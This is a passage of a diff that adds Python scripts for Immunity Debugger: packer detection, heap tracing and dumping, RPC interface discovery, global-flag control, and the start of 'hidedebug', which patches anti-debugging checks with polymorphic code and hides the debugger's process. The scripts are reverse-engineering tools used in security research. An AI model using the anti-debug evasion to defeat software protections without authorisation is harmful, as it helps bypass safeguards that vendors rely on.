+ imm.setComment(node, "| Loop 0x%08X Node"%(loop[0]))
+
+ return "Done!"
+ if o =="-h":
+ return usage(imm)
diff --git a/1.73/PyCommands/findpacker.py b/1.73/PyCommands/findpacker.py
new file mode 100755
index 0000000..6d14e5d
--- /dev/null
+++ b/1.73/PyCommands/findpacker.py
@@ -0,0 +1,63 @@
+#!/usr/bin/env python
+
+"""
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+TODO:
+ Fix the Offset in order to actually point to the address where the ID was found. (This is just a really beta version of this script)
+"""
+
+
+__VERSION__ = '1.0'
+
+import immlib
+import getopt
+import struct
+
+DESC = """Find a Packer/Cryptor on a Module (Note: It might take some times due to the amount of signature on our db)"""
+
+def usage(imm):
+ imm.Log("!peid [-f] -m filename/module Get the RPC information of a loaded dll or for all loaded DLL's",focus=1)
+ imm.Log(" -m filename/module File or Module to search for")
+ imm.Log(" -f When set, it look in the file instead of the loaded module")
+ imm.Log(" ex: !peid -m notepad")
+ imm.Log("NOTE: It might take some times due to the amount of signature on our db")
+
+def main(args):
+ imm = immlib.Debugger()
+ if not args:
+ usage(imm)
+ return "No args"
+ try:
+ opts, argo = getopt.getopt(args, "m:f")
+ except getopt.GetoptError:
+ usage(imm)
+ return "Bad heap argument %s" % args[0]
+
+ module = None
+ OnMemory = 1
+
+ for o,a in opts:
+ if o == "-m":
+ module = a
+ elif o == '-f':
+ OnMemory = 0
+
+ if not module:
+ usage(imm)
+ return "No module provided, see the Log Window for details of usage"
+
+ try:
+ ret = imm.findPacker( module, OnMemory = OnMemory)
+ except Exception, msg:
+ return "Error: %s" % msg
+
+ if not ret:
+ return "No Packer found"
+
+ for (addr, name) in ret:
+ imm.Log("Packer found!: %s at 0x%08x" % (name, addr), address = addr)
+ return "Packers found on %s: %d" % (module, len(ret))
diff --git a/1.73/PyCommands/funsniff.py b/1.73/PyCommands/funsniff.py
new file mode 100755
index 0000000..985dd1f
--- /dev/null
+++ b/1.73/PyCommands/funsniff.py
@@ -0,0 +1,236 @@
+#!/usr/bin/env python
+
+"""
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+"""
+
+
+
+DESC="""Analize the heap pattern of a executed function"""
+
+import immlib
+import immutils
+import struct
+from immlib import LogBpHook
+from libheap import *
+import libdatatype
+import getopt
+
+# RtlAllocateHeap Hook class
+ALLOCLABEL = "Alloc Hook"
+class RtlAllocateHeapHook(LogBpHook):
+ def __init__(self, address):
+ LogBpHook.__init__(self)
+ #self.Heap = heap
+ self.hookaddr = address
+ self.Called = []
+ def run(self,regs):
+ """This will be executed when hooktype happens"""
+ imm = immlib.Debugger()
+ readaddr=""
+ size=""
+
+ res=imm.readMemory( regs['EBP'] + 8, 0xc)
+ if len(res) != 0xc or not res:
+ imm.Log("RtlAllocateHeap: ESP seems to broken, unable to get args")
+ return 0x0
+ (heap, flags, size) = struct.unpack("LLL", res)
+ #imm.Log("RtlAllocateHeap(0x%08x, 0x%08x, 0x%08x)" % (heap, flags, size))
+ called = imm.getKnowledge( "heap_%08x" % self.hookaddr )
+ if not called:
+ called = []
+ try:
+ callstack = imm.readLong( regs['EBP'] + 4)
+ except Exception:
+ callstack = 0x0
+
+ called.append( (1, callstack, heap, flags, size, regs['EAX'] ) )
+ imm.addKnowledge("heap_%08x" % self.hookaddr, called, force_add = 0x1)
+
+# RtlFreeHeap Hook class
+FREELABEL = "Free Hook"
+class RtlFreeHeapHook(LogBpHook):
+ def __init__(self, address):
+ LogBpHook.__init__(self)
+ self.hookaddr = address
+
+ def run(self,regs):
+ """This will be executed when hooktype happens"""
+ imm = immlib.Debugger()
+
+ readaddr=""
+ size=""
+
+ res=imm.readMemory( regs['ESP'] + 4, 0xc)
+ if len(res) != 0xc:
+ imm.Log("RtlFreeHeap: ESP seems to broken, unable to get args")
+ return 0x0
+ (heap, flags, size) = struct.unpack("LLL", res)
+ called = imm.getKnowledge( "heap_%08x" % self.hookaddr )
+
+ if not called:
+ called = []
+ try:
+ callstack = imm.readLong( regs['EBP'] + 4)
+ except Exception:
+ callstack = 0x0
+
+ called.append( (0, callstack, heap, flags, size) )
+ imm.addKnowledge("heap_%08x" % self.hookaddr, called, force_add = 0x1)
+
+class EndHook(LogBpHook):
+ def __init__( self, retaddr ):
+ LogBpHook.__init__(self)
+ self.retaddr = retaddr
+
+ def run(self, regs):
+ imm = immlib.Debugger()
+
+ called = imm.getKnowledge("heap_%08x" % self.retaddr)
+ (ahook, fhook) = imm.getKnowledge("end_%08x" % self.retaddr)
+ ahook.UnHook()
+ fhook.UnHook()
+ win = imm.createTable("Function Sniffing", ["Address", "Data"] )
+ memleak = {}
+ freelist = {}
+ win.Log("Dumping the Heap Flow")
+ if called:
+ for res in called:
+ if res[0] == 1:
+ type, callstack, heap, flag, size, ret = res
+ memleak[ ret ] = (callstack, heap, flag, size, ret)
+ win.Log("Alloc(0x%08x, 0x%08x, 0x%08x) -> 0x%08x" %\
+ ( heap, flag, size, ret ), address = callstack )
+ elif res[0] == 0:
+ type, callstack, heap, flag, size = res
+ if memleak.has_key( size):
+ del memleak[ size ]
+ else:
+ freelist[ size ] = (callstack, heap, flag, size)
+
+ win.Log("Free (0x%08x, 0x%08x, 0x%08x)" %\
+ ( heap, flag, size ), address = callstack )
+
+ win.Log("Chunk freed but not allocated on this heap flow")
+ pheap = PHeap( imm )
+ dt = libdatatype.DataTypes(imm)
+
+ for a in freelist.keys():
+ (callstack, heap, flag, base) = freelist[a]
+ win.Log("Free (0x%08x, 0x%08x, 0x%08x)" %\
+ ( heap, flag, base ), address = callstack )
+
+
+ win.Log("Memleak detected")
+ for a in memleak.keys():
+ (callstack, heap, flag, size, ret) = memleak[a]
+ win.Log("Alloc(0x%08x, 0x%08x, 0x%08x) -> 0x%08x" %\
+ ( heap, flag, size, ret ), address = callstack )
+
+ chk = pheap.getChunks( ret - 8, 1)[0]
+ chk.printchunk( uselog = win.Log, dt = dt )
+ imm.Log("Funsniff finished, check the newly created window")
+ self.UnHook()
+
+# Function Hook class
+class FunctionHook(LogBpHook):
+ def __init__( self, allocaddr, freeaddr, continuos = False):
+ LogBpHook.__init__(self)
+ #self.threadid = threadid
+ self.allocaddr = allocaddr
+ self.freeaddr = freeaddr
+ self.continuos = continuos
+
+ def run(self, regs):
+ """This will be executed when hooktype happens"""
+ imm = immlib.Debugger()
+ # We will probably gonna need the threadid. Gather it through getEvent()
+ readaddr=""
+ size=""
+ retaddr = imm.readLong( regs['EBP'] + 4)
+ for a in regs:
+ imm.Log("%s:%08x" % (a, regs[a]))
+
+ if not retaddr:
+ self.UnHook()
+ imm.Log("Unhooking, wrong ESP")
+ return
+
+
+ endhook = EndHook( retaddr )
+ endhook.add("EndHook_%x" % retaddr, retaddr)
+
+ ahook = RtlAllocateHeapHook( retaddr)
+ ahook.add( "Alloc_%08x"% retaddr, self.allocaddr)
+
+ fhook = RtlFreeHeapHook( retaddr)
+ fhook.add( "Free_%08x" % retaddr, self.freeaddr)
+ imm.addKnowledge("end_%08x" % retaddr, (ahook, fhook) )
+
+ imm.Log("o Sniffing the selected Function", address = regs['EIP'])
+ if not self.continuos:
+ self.UnHook()
+
+
+def getRet(imm, allocaddr, max_opcodes = 500):
+ addr = allocaddr
+ for a in range(0, max_opcodes):
+ op = imm.disasmForward( addr )
+ if op.isRet():
+ if op.getImmConst() == 0xc:
+ op = imm.disasmBackward( addr, 3)
+ return op.getAddress()
+ addr = op.getAddress()
+
+ return 0x0
+
+def usage(imm):
+ imm.Log( "!funsniff -a ADDRESS (-c) Analize the heap pattern of a executed function" )
+ imm.Log( " -a ADDRESS Address of Function to fingerprint")
+ imm.Log( " -c Continuos")
+
+def main(args):
+ imm = immlib.Debugger()
+
+ address = 0x0
+ continuos = False
+ if not args:
+ usage(imm)
+ return "Wrong Arguments (Check usage on the Log Window)"
+
+ try:
+ opts, argo = getopt.getopt(args, "a:c")
+ except getopt.GetoptError:
+ return "Wrong Arguments (Check usage on the Log Window)"
+
+ for o,a in opts:
+ if o == '-a':
+ try:
+ address = int( a, 16 )
+ except ValueError:
+ usage(imm)
+ return "Wrong Address (%s) % " % a
+ elif o == '-c':
+ continuos = True
+
+ if not address:
+ return "Wrong Arguments (Check usage on the Log Window)"
+
+ allocaddr = imm.getAddress("ntdll.RtlAllocateHeap" )
+ freeaddr = imm.getAddress("ntdll.RtlFreeHeap" )
+ allocaddr = getRet(imm, allocaddr, 800)
+
+ if not allocaddr or not freeaddr:
+ imm.Log("Error, couldn't find the address of allocateHeap or freeHeap")
+ return "Error resolving Address"
+
+ imm.Log("Func Sniffing starting")
+ imm.Log("o Setting the first hook")
+ hook = FunctionHook( allocaddr, freeaddr )
+ hook.add( "Func_%08x" % address, address)
+ return "Hook set"
+
diff --git a/1.73/PyCommands/getevent.py b/1.73/PyCommands/getevent.py
new file mode 100755
index 0000000..737aec4
--- /dev/null
+++ b/1.73/PyCommands/getevent.py
@@ -0,0 +1,21 @@
+import immlib
+from libevent import ExceptionEvent
+
+DESC="Get a log of current debugevent"
+
+def main(args):
+ imm=immlib.Debugger()
+ evento = imm.getEvent()
+ if evento:
+ if isinstance(evento, ExceptionEvent):
+ for a in evento.Exception:
+ imm.Log("Exception: %s (0x%08x)" % (a.getType(), a.ExceptionCode), focus = 1)
+ imm.Log("Exception address: 0x%08x" % a.ExceptionAddress)
+ imm.Log("Exception num param: %d" % a.NumberParameters)
+ for value in a.ExceptionInformation:
+ imm.Log(hex(value))
+ else:
+ imm.Log("Last event type: 0x%08x (%s) " % (evento.dwDebugEventCode, str(evento) ) )
+ return "Works"
+ else:
+ return "Cannot handle this exception"
\ No newline at end of file
diff --git a/1.73/PyCommands/getrpc.py b/1.73/PyCommands/getrpc.py
new file mode 100755
index 0000000..3cf4f97
--- /dev/null
+++ b/1.73/PyCommands/getrpc.py
@@ -0,0 +1,116 @@
+#!/usr/bin/env python
+
+"""
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+Additional feature of iterating through all DLL's added by Justin Seitz
+
+"""
+
+import immlib
+import getopt
+import struct
+
+DESC = """Get the RPC information of a loaded dll"""
+
+def usage(imm):
+ imm.Log("!getrpc filename|all Get the RPC information of a loaded dll or for all loaded DLL's",focus=1)
+
+def get_rpc_info(imm,mod,module_name):
+
+ codeaddr = mod.getBase()
+ size = mod.getSize()
+ mem = imm.readMemory(codeaddr, size)
+ ndx = 0
+ offset = ndx
+ Found = 0
+ while 1:
+ offset = mem[ndx:].find("\x04\x5d\x88\x8a")
+ if offset == -1:
+ break
+ offset -= 0x18
+
+ try:
+ length = struct.unpack("L", mem[ndx+offset : ndx+offset+4])[0]
+ if length == 0x44:
+ Found += 1
+ addr = codeaddr + ndx + offset
+
+ imm.Log("RPC SERVER INTERFACE found at: 0x%08x" % addr, address = addr)
+ hu= struct.unpack("LHH", mem[ndx+offset+4 : ndx+offset+0xc])
+ hu2 = struct.unpack("!HLH", mem[ndx+offset+0xc : ndx+offset+0x14])
+ uuid = "%08x-%04x-%04x-%04x-%08x%04x" % (hu[0], hu[1], hu[2], hu2[0], hu2[1], hu2[2])
+ major,minor = struct.unpack("HH", mem[ndx+offset+0x14 : ndx+offset+0x18])
+ imm.Log("RPC UUID: %s (v%d.%d)" % (uuid, major, minor))
+ imm.gotoDisasmWindow(addr)
+ imm.setComment(offset + codeaddr, "Length")
+ imm.setComment(offset + codeaddr+4, "Interface UUID: %s (v%d.%d)" % (uuid, major, minor))
+ imm.setComment(offset + codeaddr+0x18, "Transfer syntax")
+ imm.setComment(offset + codeaddr+0x2c, "Dispatch Table")
+ imm.setComment(offset + codeaddr+0x30, "RpcProtseqEndpointCount")
+ imm.setComment(offset + codeaddr+0x34, "RpcProtseqEndpoint")
+ imm.setComment(offset + codeaddr+0x38, "Default Manager")
+ imm.setComment(offset + codeaddr+0x3c, "Interpreter Info")
+ imm.setComment(offset + codeaddr+0x40, "Flags")
+ interpreter_info = struct.unpack("L", mem[ndx+offset+0x3c : ndx+offset+0x3c+4] )[0]
+ function_list_addr = imm.readLong( interpreter_info + 4)
+ dispatch_table = struct.unpack("L", mem[ndx+offset+0x2c : ndx+offset+0x2c+4] )[0]
+ number = imm.readLong( dispatch_table )
+ function_ptr = imm.readLong( dispatch_table + 4 )
+ for a in range(0, number):
+ func = imm.readLong(function_list_addr+a*4)
+ imm.Log("Function[%d]: 0x%08x" % (a , func), address = func, focus=1)
+ for a in range(0, number):
+ func = imm.readLong(function_ptr+a*4)
+ imm.Log("Function pointer [%d]: 0x%08x" % (a , func), address = function_ptr+a*4)
+
+ except Exception, msg:
+ pass
+ ndx += offset+0x20
+ del mem
+ if Found:
+ imm.Log("Module: %s END ===============================================================================" % module_name)
+ return "Found %d interfaces on %s" % (Found, module_name)
+ else:
+ return "No interface found on %s" % module_name
+
+
+def main(args):
+ imm = immlib.Debugger()
+ module_exists = False
+ if not args:
+ usage(imm)
+ return "Incorrect number of arguments (No args)"
+ if len(args) != 1:
+ usage(imm)
+ return "Incorrect number of arguments"
+
+
+
+ if args[0].lower() == "all":
+ mod_list = imm.getAllModules()
+ for mod in mod_list.iteritems():
+ module = imm.getModule(mod[0])
+ sys_dll = module.getIssystemdll()
+
+ if sys_dll == 0:
+ imm.setStatusBar("Fetching RPC information for: %s" % mod[0])
+ get_rpc_info(imm,module,mod[0])
+ module_exists = True
+ else:
+
+ mod = imm.getModule(args[0])
+
+ if mod:
+ module_exists = True
+ imm.setStatusBar("Fetching RPC information for: %s" % args[0])
+ get_rpc_info(imm,mod,args[0])
+
+
+ if module_exists == False:
+ return "Module not found"
+ else:
+ return "Module information outputted, check the Log."
diff --git a/1.73/PyCommands/gflags.py b/1.73/PyCommands/gflags.py
new file mode 100755
index 0000000..0facee8
--- /dev/null
+++ b/1.73/PyCommands/gflags.py
@@ -0,0 +1,94 @@
+#!/usr/bin/env python
+
+"""
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+"""
+
+DESC="""gflags"""
+
+import getopt
+import immlib
+import libregisters
+
+def usage(imm):
+ imm.Log("!gflags -[a|d|c] -m module Enable and Disable Global Flags", focus=1)
+ imm.Log("-m module Module to set the global flags")
+ imm.Log("-a tag Set a Flag")
+ imm.Log("-d tag Unset a Flag")
+ imm.Log("-c Clear Flags")
+ imm.Log("tags: ")
+ for tag in libregisters.GFlagsTags:
+ r = libregisters.GFlagsRef[tag]
+ imm.Log( " %s - %s" % ( tag, r[0] ) )
+
+def main(args):
+ imm = immlib.Debugger()
+
+ try:
+ opts, argo = getopt.getopt(args, "m:a:d:c", ["module=", "add=", "delete=", "clear"])
+ except getopt.GetoptError:
+ usage(imm)
+ return "Wrong Argument (Check Log Window)"
+
+ add_f = []
+ delete_f = []
+ clear_f = False
+ module = ""
+ for o,a in opts:
+ if o in ('-a', "--add"):
+ add_f.append( a )
+ elif o in ('-d', "--delete"):
+ delete_f.append( a )
+ elif o in ('-c', "--clear"):
+ clear_f = True
+ elif o in ('-m', "--module"):
+ module = a
+
+ gf = libregisters.GFlags( module)
+
+ if not clear_f:
+ if add_f:
+ curr = 0
+ for tag in add_f:
+ try:
+ r = gf.GetReferencebyName( tag )
+ except Exception, msg:
+ usage(imm)
+ return "Error: %s" % str(msg)
+ curr = curr | r[1]
+ gf.Set( curr )
+ imm.Log("Global Flags added")
+ if delete_f:
+ curr = 0
+ for tag in delete_f:
+ try:
+ r = gf.GetReferencebyName( tag )
+ except Exception, msg:
+ usage(imm)
+ return "Error: %s" % str(msg)
+ curr = curr | r[1]
+ gf.UnSet( curr )
+ imm.Log("Global Flags Deleted")
+
+ else:
+ gf.Clear()
+ return "Global Flag cleared"
+
+ if not clear_f:
+ try:
+ ret = gf.Print()
+ except Exception:
+ return "GlobalFlag not found"
+ if module:
+ txt = "Current Flags for module %s" % module
+ else:
+ txt = "Current Global Flags:"
+ imm.Log(txt)
+ for (tag, r) in ret:
+ imm.Log(" %s: %s" % (tag, r[0]))
+ return "Done"
+
\ No newline at end of file
diff --git a/1.73/PyCommands/heap.py b/1.73/PyCommands/heap.py
new file mode 100755
index 0000000..0393c65
--- /dev/null
+++ b/1.73/PyCommands/heap.py
@@ -0,0 +1,198 @@
+#!/usr/bin/env python
+
+"""
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+"""
+
+import immlib
+import getopt
+from libheap import *
+import libdatatype
+
+DESC= "Immunity Heap Dump"
+def usage(imm):
+ imm.Log("!heap Heap dump of currents heaps")
+ imm.Log("!heap [-h HEAP_ADDR] [-s] [-r] [-f] [-c]")
+ imm.Log(" -h HEAPADDR Set the heap address to inspect")
+ imm.Log(" -a CHUNKADDR Set the begging of a chunk to partially inspect")
+ imm.Log(" -s Save heap's state")
+ imm.Log(" -r Dump heap using restored value (in case of a broken chunk)")
+ imm.Log(" -f Inspect the FreeList only")
+ imm.Log(" -c Inspect the chunks only")
+ imm.Log(" -k Shows the first 16 bytes of a chunk")
+ imm.Log(" -d Inspect data on Chunks")
+ imm.Log(" -q Dont show FreeList information")
+ imm.Log(" -l Inspect all the Low Fragmentation Information")
+ imm.Log(" -t PACK_SIZE Filter by Packed Size ( Real Size / 8 )")
+ imm.Log(" -u Inspect LFH UserBlocks")
+ imm.Log(" -z Inspect LFH Chunks", focus = 1 )
+
+def main(args):
+ imm = immlib.Debugger()
+ window = None
+
+ if not args:
+ imm.Log("### Immunity's Heapdump ###")
+ for hndx in imm.getHeapsAddress():
+ imm.Log("Heap: 0x%08x" % hndx, address = hndx, focus = 1)
+ return "Heap command successful"
+
+ # options:
+ # -h HEAP
+ # -s (save heap's state)
+ # -r (restore in case of broken heap)
+ # -f dump just the freelist
+ # -c dump just chunks
+ # -d discover
+ try:
+ opts, argo = getopt.getopt(args, "h:lsurfcqknzda:t:")
+ except getopt.GetoptError:
+ #imm.setStatusBar("Bad heap argument %s" % args[0])
+ usage(imm)
+ return "Bad heap argument %s" % args[0]
+ heap = 0x0
+ save = False
+ restore = False
+ freelist = False
+ chunksflags = False
+ chunkdisplay = 0
+ opennewwindow = False
+ discover = None
+ chunkaddress = None
+ LFH = False
+ userblock = False
+ lfhchunk = False
+ showf = True
+ fsize = -1
+
+ for o,a in opts:
+ if o == "-h":
+ try:
+ heap = int(a, 16)
+ except ValueError, msg:
+ return "Invalid heap address: %s" % a
+ if o == "-a":
+ try:
+ chunkaddress = int(a, 16)
+ except ValueError, msg:
+ return "Invalid chunk address: %s" % a
+ if o == "-t":
+ try:
+ fsize = int(a, 16)
+ except ValueError, msg:
+ return "Incorrect filter size : %s" % a
+
+ elif o == "-s":
+ save = True
+ elif o == "-r":
+ restore = True
+ elif o == "-f":
+ freelist = True
+ elif o == "-c":
+ chunksflags = True
+ elif o == "-k":
+ chunkdisplay = SHOWCHUNK_FULL
+ elif o == "-n":
+ opennewwindow = True
+ elif o == "-d":
+ discover = libdatatype.DataTypes(imm)
+ elif o == '-l':
+ LFH = True
+ elif o == '-u':
+ userblock = True
+ elif o == '-z':
+ lfhchunk = True
+ elif o == '-q':
+ showf = False
+
+ if heap and ( heap in imm.getHeapsAddress() ):
+ tag = "heap_%08x" % heap
+
+ if not opennewwindow:
+ window = imm.getKnowledge(tag)
+ if window and not window.isValidHandle():
+ imm.forgetKnowledge(tag)
+ del window
+ window = None
+
+ if not window:
+ window = imm.createTable("Heap dump 0x%08x" % heap, ["Address", "Chunks"] )
+ imm.addKnowledge(tag, window, force_add = 1)
+
+ # in case none of them are select, dump *
+ if showf and (not chunksflags and not freelist):
+ chunksflags = True
+ freelist = True
+
+ pheap = imm.getHeap( heap, restore )
+ if save:
+ imm.addKnowledge("saved_heap_%08x" % pheap.address , pheap, force_add = 1)
+
+ window.Log("### Immunity's Heapdump ###")
+ window.Log("Dumping heap: 0x%08x" % heap, address = heap, focus = 1 )
+ window.Log("Flags: 0x%08x Forceflags: 0x%08x" % (pheap.Flags, pheap.ForceFlags), address = heap)
+ window.Log("Total Free Size: 0x%08x VirtualMemoryThreshold: 0x%08x" % (pheap.TotalFreeSize, pheap.VirtualMemoryThreshold), address = heap)
+ if showf:
+ for a in range(0, len(pheap.Segments)):
+ if not pheap.Segments[a]:
+ break
+ window.Log("Segment[%d]: 0x%08x" % (a, pheap.Segments[a].BaseAddress) )
+
+ if freelist:
+ if hasattr(pheap, 'FreeListInUseLong'):
+ pheap.printFreeListInUse(uselog = window.Log )
+
+ pheap.printFreeList( uselog = window.Log)
+
+ if chunksflags:
+ for chunk in pheap.chunks:
+ chunk.printchunk(uselog = window.Log, option = chunkdisplay, dt = discover)
+ if userblock or lfhchunk:
+ LFH = True
+
+ if LFH and pheap.LFH:
+ if not userblock and not lfhchunk:
+ userblock = True
+ lfhchunk = True
+ window.Log("~" * 0x47)
+ if pheap.LFH.LocalData:
+ for seginfo in pheap.LFH.LocalData.SegmentInfo:
+ subseg_list = seginfo.SubSegment
+ for subseg in subseg_list:
+ if fsize == -1 or subseg.BlockSize == fsize:
+ if userblock:
+ window.Log("UserBlock size: 0x%04x %-8s: 0x%08x offset: %08x Depth: %x (0x%08x)" % (subseg.BlockSize, subseg.type, subseg.UserBlocks, subseg.Offset, subseg.Depth, subseg.Next), address = subseg.UserBlocks)
+ if lfhchunk:
+ for chk in subseg.chunks:
+ chk.printchunk(uselog = window.Log, option = chunkdisplay, dt = discover)
+
+ window.Log("=-" * 0x23 + "=")
+ return "Heap 0x%x dumped" % heap
+
+ elif chunkaddress:
+
+ tag = "chunks_%08x" % chunkaddress
+
+ if not opennewwindow:
+ window = imm.getKnowledge(tag)
+
+ if not window:
+ window = imm.createTable("Heap dump 0x%08x" % chunkaddress, ["Address", "Chunks"] )
+ imm.addKnowledge(tag, window, force_add = 1)
+
+ pheap = PHeap( imm )
+
+ window.Log("### Immunity's Heapdump ###")
+ window.Log("Dumping Chunks from address: 0x%08x" % chunkaddress, address = chunkaddress, focus = 1 )
+
+ for chunk in pheap.getChunks( chunkaddress ):
+ chunk.printchunk(uselog = window.Log, option = chunkdisplay, dt = discover)
+
+ window.Log("=-" * 0x23 + "=")
+ return "Heap 0x%x dumped" % heap
+ else:
+ imm.Log("Error: A proper heap needs to be defined")
+ return "Error: A proper heap needs to be defined"
diff --git a/1.73/PyCommands/hidedebug.py b/1.73/PyCommands/hidedebug.py
new file mode 100755
index 0000000..dde4048
--- /dev/null
+++ b/1.73/PyCommands/hidedebug.py
@@ -0,0 +1,842 @@
+#!/usr/bin/env python
+
+#-------------------------------------------------------------------------------
+#
+# By BoB -> Team PEiD
+# http://www.PEiD.info/BobSoft/
+# BobSoft@GMail.Com
+#
+#-------------------------------------------------------------------------------
+
+import immlib
+import getopt
+import random
+import ctypes
+
+#-------------------------------------------------------------------------------
+
+__VERSION__ = '1.00'
+ProgName = 'HideDebug'
+ProgVers = __VERSION__
+DESC = "Patches lots of anti-debug protection .. (try \"!usage %s\" for details)" % ProgName.lower()
+
+#-------------------------------------------------------------------------------
+
+Docs = """
+
+Loosely based on patch.py (c) Immunity inc .. :)
+
+Patches:
+ o IsDebuggerPresent (With Poly-patch code, as too easy to detect Xor EAX, EAX)
+ o ZwQueryInformationProcess
+ o CheckRemoteDebuggerPresent
+ o PEB.IsDebugged
+ o PEB.ProcessHeap.Flag
+ o PEB.NtGlobalFlag
+ o PEB.Ldr 0xFEEEFEEE filling
+ o GetTickCount (With poly-patch code, as too easy to detect Mov EAX, xxxxxxxx)
+ o ZwQuerySystemInformation (Used by CreateToolHelp32Snapshot / Process32First / Process32Next and others)
+ o FindWindowA
+ o FindWindowW
+ o FindWindowExA
+ o FindWindowExW
+ o EnumWindows
+
+
+Types:
+ o Anti-Debug Types:
+ IsDebuggerPresent
+ ZwQueryInformationProcess
+ CheckRemoteDebuggerPresent
+ PEB (All PEB patches are done)
+ GetTickCount
+ All_Debug - Applies ALL Debug detect patches ..
+
+ o Anti-Process-finding Types:
+ ZwQuerySystemInformation (All other process apis use this)
+ All_Process - Applies the debugger-process finding Api patch ..
+
+ o Anti-Window-finding Types:
+ FindWindowA
+ FindWindowW
+ FindWindowExA
+ FindWindowExW
+ EnumWindows
+ All_Window - Applies ALL debugger-window finding Api patches ..
+
+
+
+ Sorry for any weird code, I've only been using Python for 2 weeks .. :)
+
+
+
+Description:
+ Most of the functions are patched to return Debugger Found = False ..
+ The PEB patches are to the various flags in PEB used by anti-debug ..
+ Patch for ZwQueryInformationProcess is if DebugPort is checked, returns not debugged ..
+ Patch for GetTickCount is to return same number everytime ..
+ Patch for ZwQuerySystemInformation is to replace all ImmunityDebugger.exe with SVCHost.EXE ..
+ Patch for Window finding apis call Api and if "ID" is classname then return not found ..
+
+
+Maybe ToDo:
+ o Patch CreateThread ?
+
+"""
+
+
+#-------------------------------------------------------------------------------
+# Show usage ..
+
+def usage(imm):
+ imm.Log(" ")
+ imm.Log("%s v%s By BoB -> Team PEiD" % (ProgName, ProgVers),focus=1, highlight=1)
+ imm.Log("Description:")
+ imm.Log(" Patches many different flags and apis used to detect debuggers ..")
+ imm.Log(" Different combinations of patches will defeat most protections, ")
+ imm.Log(" and some common anti-debug apis are patched with poly code ")
+ imm.Log(" to avoid detection by packers like RL!Pack .. ")
+ imm.Log(" All apis return usual valid data, the patches do not affect normal use .. ")
+ imm.Log(" EG: FindWindowA('NotePad.EXE', Null) will work same if patched or not..")
+ imm.Log(" ")
+ imm.Log("Usage:")
+ imm.Log(" !%s " % ProgName.lower())
+ imm.Log(" ")
+ imm.Log("Type can be ..")
+ imm.Log(" Debugger-Detect Types:")
+ imm.Log(" . IsDebuggerPresent - Patches the Kernel32 Api to return false ..")
+ imm.Log(" . CheckRemoteDebuggerPresent - Patches the Kernel32 Api ..")
+ imm.Log(" . ZwQueryInformationProcess - Patches the NtDll Api only for getting DebugPort ..")
+ imm.Log(" . GetTickCount - Patches the Kernel32 Api to always return same value ..")
+ imm.Log(" . Peb - Patches PEB.IsDebugged, PEB.ProcessHeap.Flag, PEB.NtGlobalFlag and fill bytes ..")
+ imm.Log(" . All_Debug - Applies patches for all of the above .. ")
+ imm.Log(" ")
+ imm.Log(" Debugger-Detect by Process Types: ")
+ imm.Log(" . ZwQuerySystemInformation - Patches the NtDll Api to remove ImmDbg from list ..")
+ imm.Log(" . All_Process - Applies all process patches above .. ")
+ imm.Log(" ")
+ imm.Log(" Debugger-Detect by Window Types: (User32.DLL must be loaded)")
+ imm.Log(" . FindWindowA - Reports false if process looks for ImmDbg win classname ..")
+ imm.Log(" . FindWindowW - Reports false if process looks for ImmDbg win classname ..")
+ imm.Log(" . FindWindowExA - Reports false if process looks for ImmDbg win classname ..")
+ imm.Log(" . FindWindowExW - Reports false if process looks for ImmDbg win classname ..")
+ imm.Log(" . EnumWindows - Own callback function calls user callback if not ImmDbg HWnd ..")
+ imm.Log(" . All_Window - Applies all window patches above .. ")
+ imm.Log(" ")
+ return "See log window (Alt-L) for usage .. "
+
+
+#-------------------------------------------------------------------------------
+# Misc functions ..
+#-------------------------------------------------------------------------------
+
+#-------------------------------------------------------------------------------
+# Write Poly instructions to patch an EAX = Dword-Value instruction onto an Api ..
+
+def Poly_ReturnDW(imm, Value):
+ I = random.randint(1, 3)
+ if I == 1:
+ if random.randint(1, 2) == 1:
+ # 7 bytes ..
+ return imm.Assemble( "Sub EAX, EAX\n Add EAX, 0x%08x" % Value )
+ else:
+ # 7 bytes ..
+ return imm.Assemble( "Sub EAX, EAX\n Sub EAX, -0x%08x" % Value )
+ if I == 2:
+ # 6 bytes
+ return imm.Assemble( "Push 0x%08x\n Pop EAX\n" % Value )
+ if I == 3:
+ if random.randint(1, 2) == 1:
+ # 7 bytes with optimized instruction ..
+ return imm.Assemble( "XChg EAX, EDI\n DB 0xBF\n DD 0x%08x\n XChg EAX, EDI" % Value )
+ else:
+ # 8 bytes cos not optimized ..
+ return imm.Assemble( "XChg EAX, EDI\n Mov EDI, 0x%08x\n XChg EAX, EDI" % Value )
+
+
+#-------------------------------------------------------------------------------
+# Write Poly instructions to patch a simple EAX = 0 onto an Api ..
+
+def Poly_Return0(imm):
+ I = random.randint(1, 4)
+ if I == 1:
+ # 2 bytes
+ return imm.Assemble( "Sub EAX, EAX" )
+ if I == 2:
+ if random.randint(1, 2) == 1:
+ # 6 bytes
+ return imm.Assemble( "Push 0\n Pop EAX" )
+ else:
+ # 3 bytes
+ return imm.Assemble( "DB 0x6A, 0x00\n Pop EAX" )
+ if I == 3:
+ # 4 bytes
+ return imm.Assemble( "XChg EAX, EDI\n Sub EDI, EDI\n XChg EAX, EDI" )
+ if I == 4:
+ return Poly_ReturnDW(imm, 0)
+
+
+#-------------------------------------------------------------------------------
+# Debug Detection Patches ..
+#-------------------------------------------------------------------------------
+
+#-------------------------------------------------------------------------------
+# Clear various debug flags in PEB ..
+
+def Patch_PEB(imm):
+ PEB = imm.getPEBaddress()
+ # Just incase .. ;)
+ if PEB == 0:
+ imm.Log( "No PEB to patch .. !?" )
+ return
+
+ imm.Log( "Patching PEB.IsDebugged ..", address = PEB + 0x02 )
+ imm.writeMemory(PEB + 0x02, imm.Assemble( "db 0" ) )
+
+ a = imm.readLong(PEB + 0x18)
+ a += 0x10
+ imm.Log( "Patching PEB.ProcessHeap.Flag ..", address = a )
+ imm.writeLong( a, 0 )
+
+ imm.Log( "Patching PEB.NtGlobalFlag ..", address = PEB + 0x68 )
+ imm.writeLong(PEB + 0x68, 0)
+
+ # Patch PEB_LDR_DATA 0xFEEEFEEE fill bytes .. (about 3000 of them ..)
+ a = imm.readLong(PEB + 0x0C)
+ imm.Log("Patching PEB.LDR_DATA filling ..", address = a)
+ while a != 0:
+ a += 1
+ try:
+ b = imm.readLong(a)
+ c = imm.readLong(a + 4)
+ # Only patch the filling runs ..
